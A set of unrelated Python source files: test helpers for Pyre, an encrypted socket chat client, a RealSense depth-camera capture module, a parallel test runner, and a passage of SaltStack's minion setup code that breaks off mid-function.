|
setup.py
|
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import asyncio
import contextlib
import functools
import json
import os
import socketserver
import tempfile
import threading
from pathlib import Path
from typing import (
Any,
Awaitable,
Callable,
Generator,
Iterable,
Mapping,
Optional,
Type,
TypeVar,
)
from pyre_extensions import ParameterSpecification
from ..find_directories import CONFIGURATION_FILE, LOCAL_CONFIGURATION_FILE
TParams = ParameterSpecification("TParams")
T = TypeVar("T")
def ensure_files_exist(root: Path, relatives: Iterable[str]) -> None:
for relative in relatives:
full_path = root / relative
full_path.parent.mkdir(parents=True, exist_ok=True)
full_path.touch(exist_ok=True)
def ensure_directories_exists(root: Path, relatives: Iterable[str]) -> None:
for relative in relatives:
full_path = root / relative
full_path.mkdir(parents=True, exist_ok=True)
def write_configuration_file(
root: Path, content: Mapping[str, Any], relative: Optional[str] = None
) -> None:
if relative is None:
(root / CONFIGURATION_FILE).write_text(json.dumps(content))
else:
local_root = root / relative
local_root.mkdir(parents=True, exist_ok=True)
(local_root / LOCAL_CONFIGURATION_FILE).write_text(json.dumps(content))
@contextlib.contextmanager
def switch_working_directory(directory: Path) -> Generator[None, None, None]:
original_directory = Path(".").resolve()
try:
os.chdir(str(directory))
yield None
finally:
os.chdir(str(original_directory))
@contextlib.contextmanager
def switch_environment(environment: Mapping[str, str]) -> Generator[None, None, None]:
old_environment = dict(os.environ)
os.environ.clear()
os.environ.update(environment)
try:
yield
finally:
os.environ.clear()
os.environ.update(old_environment)
def async_test(func: Callable[TParams, Awaitable[T]]) -> Callable[TParams, T]:
"""
Simple Decorator to allow for asyncio test methods in a standard
`unittest.TestCase`.
"""
@functools.wraps(func)
def wrapper(*args: TParams.args, **kwargs: TParams.kwargs) -> T:
return asyncio.get_event_loop().run_until_complete(func(*args, **kwargs))
return wrapper
class TestServer(socketserver.ThreadingMixIn, socketserver.UnixStreamServer):
pass
@contextlib.contextmanager
def spawn_unix_stream_server_with_socket(
handler: Type[socketserver.BaseRequestHandler], socket_path: Path
) -> Generator[None, None, None]:
# Spawn a test server on another thread
server = TestServer(str(socket_path), handler)
server_thread = threading.Thread(target=server.serve_forever)
try:
server_thread.start()
yield
finally:
# Shutdown the server and terminate the test
server.shutdown()
server.server_close()
@contextlib.contextmanager
def spawn_unix_stream_server(
handler: Type[socketserver.BaseRequestHandler],
) -> Generator[Path, None, None]:
# Force /tmp as the temporary root, so path length would be under control
with tempfile.TemporaryDirectory(dir="/tmp") as socket_root:
socket_path = Path(socket_root) / "test.socket"
with spawn_unix_stream_server_with_socket(handler, socket_path):
yield socket_path
|
client.py
|
from cryptoran import blockcipher, keyexchange
import socket
import select
import threading
import sys, os
from PigeonConnection import PigeonConnection
class PigeonClient(PigeonConnection):
def __init__(self, serverIP: str, serverPort: int, messageHandler,
disconnectionHandler: callable, cipherIV = None, cipher = None):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((serverIP, serverPort))
self.bufferSize = 1024
self.connectionAlive = True
self.disconnectionHandler = disconnectionHandler
self.printLock = threading.Lock()
# encryption
self.cipherClass = None
self.cipher = None
if cipher:
self.dh = None
self.cipherClass = cipher
self.iv = cipherIV
self.cipher = None
super().__init__(serverIP, serverPort, messageHandler)
def listen(self):
if self.cipherClass:
# 1 - set common secret key with server
dhRaw = self.sock.recv(1024)
dhInfo = self.decodeUnencrypted(dhRaw)
if type(dhInfo) == list:
self.dh = keyexchange.DiffieHellman(dhInfo[0], dhInfo[1])
_, _, expSecret = self.dh.generateSecret()
else:
print('Server is probably not using encryption')
self.sendUnencrypted(expSecret, self.sock)
cipherKey = self.dh.generateSharedKey(dhInfo[2])
self.cipher = self.cipherClass('cbc', cipherKey, self.iv)
while self.connectionAlive:
try:
readable, _, _ = select.select([self.sock], [], [], 0.1)
for _ in readable:
payload = self.sock.recv(self.bufferSize)
if not payload:
raise Exception()
else:
with self.printLock:
self.messageHandler(self.decodeReceived(payload, self.cipher))
except:
self.connectionAlive = False
self.disconnectionHandler()
break
def start(self):
threading.Thread(target=self.listen).start()
def stop(self):
self.connectionAlive = False
self.sock.close()
def send(self, message):
self.sendMessage(message, (self.sock, self.cipher))
def isConnected(self):
return self.connectionAlive
if __name__ == '__main__':
aesiv = 0xed7ef412977a7df3af9e67307bd2214b
ip, port = None, None
userTermination = False
unsafe = False
try:
ip = sys.argv[1]
port = int(sys.argv[2])
if len(sys.argv) > 3 and sys.argv[3] == '--unsafe':
unsafe = True
except:
print('usage: python client.py ip port [--unsafe]')
sys.exit()
def disconnectionHandler():
print('disconnected from server!')
sys.exit()
def connectionHandler(message: str):
print(f'Server: {message}')
client = None
if not unsafe:
client = PigeonClient(ip, port, print, disconnectionHandler, aesiv, blockcipher.AES)
else:
client = PigeonClient(ip, port, print, disconnectionHandler)
client.start()
print('Connected to server\nInput ".exit" to terminate the program')
while client.isConnected():
message = input()
if message == '.exit':
userTermination = True
print('Terminating connection')
client.stop()
break
client.send(message)
|
stream.py
|
##########################################################################################################################################
## License: Apache 2.0. See LICENSE file in root directory. ##
##########################################################################################################################################
"""
Capture a stream of 3D scans from all connected Intel RealSense D4XX cameras
Distributed as a module of DynaMo: https://github.com/anderson-cu-bioastronautics/dynamo_realsense-capture
"""
import pyrealsense2 as rs
import pickle
import queue
import threading
import time
import os
import copy
import numpy as np
from .view import depthFrametoPC
def captureThread(q,deviceManager,stream_time):
"""
Function to capture frames from connected RealSense Cameras to memory
Parameters
----------
q : Queue object
Queue for storing captured frames
deviceManager : DeviceManager object
realsense_device_manager object which manages connections to all cameras
stream_time : float
Time in seconds for how long to collect data
"""
i=0
refSerial = list(deviceManager._enabled_devices.keys())[0]
fnumber = deviceManager.poll_frames()[refSerial].get_frame_number() #get frame number to ensure subsequent frames are saved
while i<int(90*stream_time):
frames = deviceManager.poll_frames()
newfnumber = frames[refSerial].get_frame_number()
if fnumber != newfnumber: #only save if frame has not already been saved
q.put(frames)
i+=1
print(str(newfnumber)+' '+str(i)+'/'+str(int(90*stream_time)))
fnumber = newfnumber
def processThread(q,devicesTransformation, saveDirectory):
"""
Function to process frames from queue to save to disk in pickle format
Parameters
----------
q : Queue object
Queue which stores captured frames
devicesTransformation : dict
dictionary with keys of camera's serial number holding dictionary of calibration parameters per camera
saveDirectory : str
Folder name in which to save frames, referenced to current working directory
"""
i=0
while not q.empty(): #while frames are still waiting to be processed
framesAll = q.get()
fname = saveDirectory+'\\'+str(format(i, '05d'))+'.pickle'
file = open(fname,'wb')
savedData={}
for device,frames in framesAll.items():
deviceData = {}
align = rs.align(rs.stream.depth) #setup rs.align object
alignedFrames = align.process(frames) #align frames
depthFrame = alignedFrames.get_depth_frame()
rsIntrinsics = depthFrame.get_profile().as_video_stream_profile().get_intrinsics()
deviceData['depth'] = copy.deepcopy(np.asanyarray(depthFrame.get_data())) #save depth frame
try:
infraredFrame = alignedFrames.get_infrared_frame(1)
deviceData['infrared'] = copy.deepcopy(np.asanyarray(infraredFrame.get_data())) #save infrared frame
except:
pass
try:
colorFrame = alignedFrames.get_color_frame()
deviceData['color'] = copy.deepcopy(np.asanyarray(colorFrame.get_data())) #save infrared frame
except:
pass
deviceData['intrinsics'] = {'ppx': rsIntrinsics.ppx, 'ppy':rsIntrinsics.ppy, 'fx':rsIntrinsics.fx, 'fy':rsIntrinsics.fy} #save relevant intrinsics
deviceData['poseMat'] = devicesTransformation[device][0] #save transformation matrix
savedData[device]=deviceData #save each camera's information in master dictionary for frame
pickle.dump(copy.deepcopy(savedData),file)
print('processed'+str(i))
i+=1
file.close()
q.task_done()
print('queue finished')
def single(deviceManager, devicesTransformation):
"""
Function to return single, aligned pointcloud from conneted Realsense Cameras
Parameters
----------
deviceManager : DeviceManager object
realsense_device_manager object which manages connections to all cameras
devicesTransformation : dict
dictionary with keys of camera's serial number holding dictionary of calibration parameters per camera
Returns
-------
allPoints : (n,6) array
array containing list of all points from all connected cameras
"""
frames = deviceManager.poll_frames()
allPoints = np.empty((0,6))
for camera,frame in frames.items():
deviceData = {}
align = rs.align(rs.stream.depth) #setup rs.align object
alignedFrames = align.process(frame) #align frames
depthFrame = alignedFrames.get_depth_frame()
rsIntrinsics = depthFrame.get_profile().as_video_stream_profile().get_intrinsics()
deviceData['depth'] = copy.deepcopy(np.asanyarray(depthFrame.get_data())) #save depth frame
try:
infraredFrame = alignedFrames.get_infrared_frame(1)
deviceData['infrared'] = copy.deepcopy(np.asanyarray(infraredFrame.get_data())) #save infrared frame
except:
pass
try:
colorFrame = alignedFrames.get_color_frame()
deviceData['color'] = copy.deepcopy(np.asanyarray(colorFrame.get_data())) #save infrared frame
except:
pass
deviceData['intrinsics'] = {'ppx': rsIntrinsics.ppx, 'ppy':rsIntrinsics.ppy, 'fx':rsIntrinsics.fx, 'fy':rsIntrinsics.fy} #save relevant intrinsics
deviceData['poseMat'] = devicesTransformation[camera][0] #save transformation matrix
points = depthFrametoPC(deviceData, format='rgb')
allPoints = np.append(allPoints, points, axis=0)
return allPoints
def start(deviceManager, deviceTransformations, saveDirectory, stream_time):
"""
Function to save aligned frames from connected RealSense Cameras to disk for future processing
Parameters
----------
deviceManager : DeviceManager object
realsense_device_manager object which manages connections to all cameras
devicesTransformation : dict
dictionary with keys of camera's serial number holding dictionary of calibration parameters per camera
saveDirectory : str
Folder name in which to save frames, referenced to current working directory
time : float
Time in seconds for how long to collect data
"""
q = queue.Queue(maxsize=0) #queue object to hold incoming frames
capture = threading.Thread(target=captureThread,args=(q,deviceManager,int(stream_time))) #thread which will capture frames
process = threading.Thread(target=processThread,args=(q,deviceTransformations,saveDirectory)) #thread which will save frames to disk
capture.start()
capture.join()
time.sleep(int(stream_time)+1) #delay to allow capture thread to finish, this may or may not be needed based on hardware specifications but is recommended to reduce dropped frames
process.start()
process.join()
q.join()
|
run_tests.py
|
from __future__ import print_function
from os import walk
import sys, signal
from datetime import datetime
from multiprocessing import Process, Manager, Lock
from aggregatortester import AggregatorTester
from optimizertester import OptimizerTester
from liftertester import LifterTester
from structurertester import StructurerTester
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
def worker(lock, file_path, exceptions, total, tester):
file_name = file_path.split("/")[-1]
eprint("start " + file_name)
if file_name == "ak":
print("fix this one later")
return
with open(file_path) as file:
count = 0
for count, line in enumerate(file):
if count == 50:
break
# eprint(file_name, count)
try:
tester(line, False)
signal.alarm(0)
except Exception as ex:
signal.alarm(0)
transaction = "%s:%d" % (file_name, count)
lock.acquire()
exceptions[transaction] = (ex, len(line) / 1024)
lock.release()
# eprint(file_name, count)
signal.alarm(0)
lock.acquire()
eprint("end %s %d" % (file_name, count))
total.value += count
lock.release()
def output_exception_report(path, exceptions, total):
exception_report = open(path, "w")
exception_report.write("total count %d\n" % total)
exception_report.write("exception count %d\n" % len(exceptions))
exception_report.write("=" * 20 + "\n")
exception_types = dict()
for ex, _ in exceptions.values():
exception_type = type(ex).__name__
if exception_type not in exception_types:
exception_types[exception_type] = 0
exception_types[exception_type] += 1
for exception_type, c in exception_types.items():
exception_report.write("%s : %d\n" % (exception_type, c))
exception_report.write("=" * 20 + "\n")
for count, (ex, code_size) in exceptions.items():
exception_report.write("%s : %d [%s] %s\n" % (count, code_size, type(ex).__name__, str(ex)))
exception_report.close()
if __name__ == '__main__':
if "-l" in sys.argv:
tester = LifterTester
elif "-o" in sys.argv:
tester = OptimizerTester
elif "-a" in sys.argv:
tester = AggregatorTester
elif "-s" in sys.argv:
tester = StructurerTester
else:
eprint("tester not specified")
sys.exit()
manager = Manager()
exceptions = manager.dict()
lock = Lock()
total = manager.Value('total', 0)
target_files = []
for (path, _, file_names) in walk(sys.argv[-1]):
for file_name in file_names:
target_files.append(path + file_name)
break
processes = \
[Process(target=worker, args=(lock, f, exceptions, total, tester)) for f in target_files]
[process.start() for process in processes]
[process.join() for process in processes]
print("processes joined")
file_path = "reports/" + tester.__name__ + datetime.now().strftime('_%m-%d-%H-%M')
output_exception_report(file_path, exceptions, total.value)
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function, with_statement, unicode_literals
import functools
import os
import re
import sys
import copy
import time
import types
import signal
import random
import fnmatch
import logging
import threading
import traceback
import contextlib
import multiprocessing
from random import randint, shuffle
from stat import S_IMODE
import salt.serializers.msgpack
from binascii import crc32
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
from salt.ext import six
if six.PY3:
import ipaddress
else:
import salt.ext.ipaddress as ipaddress
from salt.ext.six.moves import range
from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO
import salt.defaults.exitcodes
from salt.utils.ctx import RequestContext
# pylint: enable=no-name-in-module,redefined-builtin
import tornado
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
try:
import salt.utils.win_functions
HAS_WIN_FUNCTIONS = True
except ImportError:
HAS_WIN_FUNCTIONS = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.engines
import salt.payload
import salt.pillar
import salt.syspaths
import salt.utils.args
import salt.utils.context
import salt.utils.data
import salt.utils.error
import salt.utils.event
import salt.utils.files
import salt.utils.jid
import salt.utils.minion
import salt.utils.minions
import salt.utils.network
import salt.utils.platform
import salt.utils.process
import salt.utils.schedule
import salt.utils.ssdp
import salt.utils.user
import salt.utils.zeromq
import salt.defaults.exitcodes
import salt.cli.daemons
import salt.log.setup
import salt.utils.dictupdate
from salt.config import DEFAULT_MINION_OPTS
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
from salt.utils.process import (default_signals,
SignalHandlingMultiprocessingProcess,
ProcessManager)
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit,
SaltDaemonNotRunning,
SaltException,
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts, fallback=True):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
# Since salt.log is imported below, salt.utils.network needs to be imported here as well
import salt.utils.network
if check_dns is True:
try:
if opts['master'] == '':
raise SaltSystemExit
ret['master_ip'] = salt.utils.network.dns_check(
opts['master'],
int(opts['master_port']),
True,
opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found or not responsive. '
'Retrying in {1} seconds').format(opts['master'], opts['retry_dns'])
if salt.log.setup.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.network.dns_check(
opts['master'],
int(opts['master_port']),
True,
opts['ipv6'])
break
except SaltClientError:
pass
else:
if fallback:
ret['master_ip'] = '127.0.0.1'
else:
raise
except SaltSystemExit:
unknown_str = 'unknown address'
master = opts.get('master', unknown_str)
if master == '':
master = unknown_str
if opts.get('__role') == 'syndic':
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. ' \
'Set \'syndic_master\' value in minion config.'.format(master)
else:
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. ' \
'Set \'master\' value in minion config.'.format(master)
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning(
'Master ip address changed from %s to %s',
opts['master_ip'], ret['master_ip']
)
if opts['source_interface_name']:
log.trace('Custom source interface required: %s', opts['source_interface_name'])
interfaces = salt.utils.network.interfaces()
log.trace('The following interfaces are available on this Minion:')
log.trace(interfaces)
if opts['source_interface_name'] in interfaces:
if interfaces[opts['source_interface_name']]['up']:
addrs = interfaces[opts['source_interface_name']]['inet'] if not opts['ipv6'] else\
interfaces[opts['source_interface_name']]['inet6']
ret['source_ip'] = addrs[0]['address']
log.debug('Using %s as source IP address', ret['source_ip'])
else:
log.warning('The interface %s is down so it cannot be used as source to connect to the Master',
opts['source_interface_name'])
else:
log.warning('%s is not a valid interface. Ignoring.', opts['source_interface_name'])
elif opts['source_address']:
ret['source_ip'] = salt.utils.network.dns_check(
opts['source_address'],
int(opts['source_ret_port']),
True,
opts['ipv6'])
log.debug('Using %s as source IP address', ret['source_ip'])
if opts['source_ret_port']:
ret['source_ret_port'] = int(opts['source_ret_port'])
log.debug('Using %d as source port for the ret server', ret['source_ret_port'])
if opts['source_publish_port']:
ret['source_publish_port'] = int(opts['source_publish_port'])
log.debug('Using %d as source port for the master pub', ret['source_publish_port'])
ret['master_uri'] = 'tcp://{ip}:{port}'.format(
ip=ret['master_ip'], port=opts['master_port'])
log.debug('Master URI: %s', ret['master_uri'])
return ret
def prep_ip_port(opts):
ret = {}
# Use given master IP if "ip_only" is set or if master_ip is an ipv6 address without
# a port specified. The is_ipv6 check returns False if brackets are used in the IP
# definition such as master: '[::1]:1234'.
if opts['master_uri_format'] == 'ip_only' or salt.utils.network.is_ipv6(opts['master']):
ret['master'] = opts['master']
else:
ip_port = opts['master'].rsplit(':', 1)
if len(ip_port) == 1:
# e.g. master: mysaltmaster
ret['master'] = ip_port[0]
else:
# e.g. master: localhost:1234
# e.g. master: 127.0.0.1:1234
# e.g. master: [::1]:1234
# Strip off brackets for ipv6 support
ret['master'] = ip_port[0].strip('[]')
# Cast port back to an int! Otherwise a TypeError is thrown
# on some of the socket calls elsewhere in the minion and utils code.
ret['master_port'] = int(ip_port[1])
return ret
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
mode: which is anything os.makedir would accept as mode.
uid: the uid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
uid. Must be int. Works only on unix/unix like systems.
gid: the gid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
gid. Must be int. Works only on unix/unix like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So lets check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
def load_args_and_kwargs(func, args, data=None, ignore_invalid=False):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
# if the arg is a dict with __kwarg__ == True, then its a kwarg
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
string_kwarg = salt.utils.args.parse_input([arg], condition=False)[1] # pylint: disable=W0632
if string_kwarg:
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
else:
_args.append(arg)
if invalid_kwargs and not ignore_invalid:
salt.utils.args.invalid_kwargs(invalid_kwargs)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
def eval_master_func(opts):
'''
Evaluate master function if master type is 'func'
and save it result in opts['master']
'''
if '__master_func_evaluated' not in opts:
# split module and function and try loading the module
mod_fun = opts['master']
mod, fun = mod_fun.split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise KeyError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod_fun]()
# Check for valid types
if not isinstance(opts['master'], (six.string_types, list)):
raise TypeError
opts['__master_func_evaluated'] = True
except KeyError:
log.error('Failed to load module %s', mod_fun)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
except TypeError:
log.error('%s returned from %s is not a string', opts['master'], mod_fun)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: %s', mod_fun)
def master_event(type, master=None):
'''
Centralized master event function which will return event type based on event_map
'''
event_map = {'connected': '__master_connected',
'disconnected': '__master_disconnected',
'failback': '__master_failback',
'alive': '__master_alive'}
if type == 'alive' and master is not None:
return '{0}_{1}'.format(event_map.get(type), master)
return event_map.get(type, None)
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
if hasattr(minion, 'schedule'):
minion.schedule.eval()
else:
log.error('Minion scheduler not initialized. Scheduled jobs will not be run.')
return
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error('Exception %s occurred in scheduled job', exc)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons', self.opts['beacons'], omit_opts=True)
if b_conf:
return self.beacons.process(b_conf, self.opts['grains']) # pylint: disable=no-member
return []
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False,
failback=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
returned. If this function is called outside the minions initialization
phase (for example from the minions main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# return early if we are not connecting to a master
if opts['master_type'] == 'disable':
log.warning('Master is set to disable, skipping connection')
self.connected = False
raise tornado.gen.Return((None, None))
# Run masters discovery over SSDP. This may modify the whole configuration,
# depending of the networking and sets of masters.
self._discover_masters()
# check if master_type was altered from its default
if opts['master_type'] != 'str' and opts['__role'] != 'syndic':
# check for a valid keyword
if opts['master_type'] == 'func':
eval_master_func(opts)
# if failover or distributed is set, master has to be of type list
elif opts['master_type'] in ('failover', 'distributed'):
if isinstance(opts['master'], list):
log.info(
'Got list of available master addresses: %s',
opts['master']
)
if opts['master_type'] == 'distributed':
master_len = len(opts['master'])
if master_len > 1:
secondary_masters = opts['master'][1:]
master_idx = crc32(opts['id']) % master_len
try:
preferred_masters = opts['master']
preferred_masters[0] = opts['master'][master_idx]
preferred_masters[1:] = [m for m in opts['master'] if m != preferred_masters[0]]
opts['master'] = preferred_masters
log.info('Distributed to the master at \'{0}\'.'.format(opts['master'][0]))
except (KeyError, AttributeError, TypeError):
log.warning('Failed to distribute to a specific master.')
else:
log.warning('master_type = distributed needs more than 1 master.')
if opts['master_shuffle']:
log.warning(
'Use of \'master_shuffle\' detected. \'master_shuffle\' is deprecated in favor '
'of \'random_master\'. Please update your minion config file.'
)
opts['random_master'] = opts['master_shuffle']
opts['auth_tries'] = 0
if opts['master_failback'] and opts['master_failback_interval'] == 0:
opts['master_failback_interval'] = opts['master_alive_interval']
# if opts['master'] is a str and we have never created opts['master_list']
elif isinstance(opts['master'], six.string_types) and ('master_list' not in opts):
# We have a string, but a list was what was intended. Convert.
# See issue 23611 for details
opts['master'] = [opts['master']]
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'%s\'', opts['master'])
# if failed=True, the minion was previously connected
# we're probably called from the minions main-event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
if failback:
# failback list of masters to original config
opts['master'] = opts['master_list']
else:
log.info(
'Moving possibly failed master %s to the end of '
'the list of masters', opts['master']
)
if opts['master'] in opts['local_masters']:
# create new list of master with the possibly failed
# one moved to the end
failed_master = opts['master']
opts['master'] = [x for x in opts['local_masters'] if opts['master'] != x]
opts['master'].append(failed_master)
else:
opts['master'] = opts['master_list']
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# If failover is set, minion have to failover on DNS errors instead of retry DNS resolve.
# See issue 21082 for details
if opts['retry_dns'] and opts['master_type'] == 'failover':
msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. '
'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.')
log.critical(msg)
opts['retry_dns'] = 0
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# FIXME: if SMinion don't define io_loop, it can't switch master see #29088
# Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop
# (The channel factories will set a default if the kwarg isn't passed)
factory_kwargs = {'timeout': timeout, 'safe': safe}
if getattr(self, 'io_loop', None):
factory_kwargs['io_loop'] = self.io_loop # pylint: disable=no-member
tries = opts.get('master_tries', 1)
attempts = 0
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
last_exc = None
opts['master_uri_list'] = []
opts['local_masters'] = copy.copy(opts['master'])
# shuffle the masters and then loop through them
if opts['random_master']:
# master_failback is only used when master_type is set to failover
if opts['master_type'] == 'failover' and opts['master_failback']:
secondary_masters = opts['local_masters'][1:]
shuffle(secondary_masters)
opts['local_masters'][1:] = secondary_masters
else:
shuffle(opts['local_masters'])
# This sits outside of the connection loop below because it needs to set
# up a list of master URIs regardless of which masters are available
# to connect _to_. This is primarily used for masterless mode, when
# we need a list of master URIs to fire calls back to.
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts['master_uri_list'].append(resolve_dns(opts)['master_uri'])
while True:
if attempts != 0:
# Give up a little time between connection attempts
# to allow the IOLoop to run any other scheduled tasks.
yield tornado.gen.sleep(opts['acceptance_wait_time'])
attempts += 1
if tries > 0:
log.debug(
'Connecting to master. Attempt %s of %s',
attempts, tries
)
else:
log.debug(
'Connecting to master. Attempt %s (infinite attempts)',
attempts
)
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = copy.copy(opts['local_masters'])
self.opts = opts
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs)
yield pub_channel.connect()
conn = True
break
except SaltClientError as exc:
last_exc = exc
if exc.strerror.startswith('Could not access'):
msg = (
'Failed to initiate connection with Master '
'%s: check ownership/permissions. Error '
'message: %s', opts['master'], exc
)
else:
msg = ('Master %s could not be reached, trying next '
'next master (if any)', opts['master'])
log.info(msg)
continue
if not conn:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
self.opts['master'] = copy.copy(self.opts['local_masters'])
log.error(
'No master could be reached or all masters '
'denied the minion\'s connection attempt.'
)
# If the code reaches this point, 'last_exc'
# should already be set.
raise last_exc # pylint: disable=E0702
else:
self.tok = pub_channel.auth.gen_token(b'salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
if opts['random_master']:
log.warning('random_master is True but there is only one master specified. Ignoring.')
while True:
if attempts != 0:
# Give up a little time between connection attempts
# to allow the IOLoop to run any other scheduled tasks.
yield tornado.gen.sleep(opts['acceptance_wait_time'])
attempts += 1
if tries > 0:
log.debug(
'Connecting to master. Attempt %s of %s',
attempts, tries
)
else:
log.debug(
'Connecting to master. Attempt %s (infinite attempts)',
attempts
)
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
try:
if self.opts['transport'] == 'detect':
self.opts['detect_mode'] = True
for trans in ('zeromq', 'tcp'):
if trans == 'zeromq' and not zmq:
continue
self.opts['transport'] = trans
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
if not pub_channel.auth.authenticated:
continue
del self.opts['detect_mode']
break
else:
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
